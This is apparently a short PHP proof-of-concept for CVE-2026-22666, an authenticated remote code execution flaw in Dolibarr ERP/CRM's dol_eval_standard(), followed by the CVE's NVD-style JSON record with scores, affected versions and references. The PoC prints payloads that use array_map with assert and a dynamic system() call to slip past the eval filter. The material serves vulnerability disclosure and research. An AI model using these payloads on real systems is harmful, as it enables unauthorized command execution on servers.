CVE-2026-22666

<?php /* * PoC for CVE-2026-22666 * Demonstrates bypassing dol_eval_standard using PHP dynamic callable syntax. * Requires administrator privileges to inject payload into computed extrafields. */ // The vulnerable function dol_eval_standard() fails to block dynamic callables. // Attackers can inject payloads into extrafields that are eventually evaluated. // Example Payload 1: Using array_map to obfuscate the call // This bypasses simple string checks for 'eval' or 'system' by using a callback. $payload = "array_map('assert', array('phpinfo();'))"; // Example Payload 2: Dynamic function call via variable // This bypasses whitelist checks that look for direct function names. $func = 'system'; $cmd = 'id'; $payload_dynamic = "$func('$cmd')"; // In the exploit scenario, these payloads would be sent via POST request // to the endpoint handling extrafields configuration (e.g., /admin/extrafields.php). // When the extrafield is rendered or processed, dol_eval_standard runs eval($payload). echo "Potential Malicious Payload for Extrafield:\n"; echo $payload . "\n"; echo "\nOr Dynamic Syntax:\n"; echo $payload_dynamic . "\n"; ?>

{"cve": {"id": "CVE-2026-22666", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:45.200", "lastModified": "2026-04-24T14:20:46.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-95"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*", "versionEndExcluding": "23.0.2", "matchCriteriaId": "21E20539-B901-4322-90BB-3FACD3AA1AE9"}]}]}], "references": [{"url": "https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}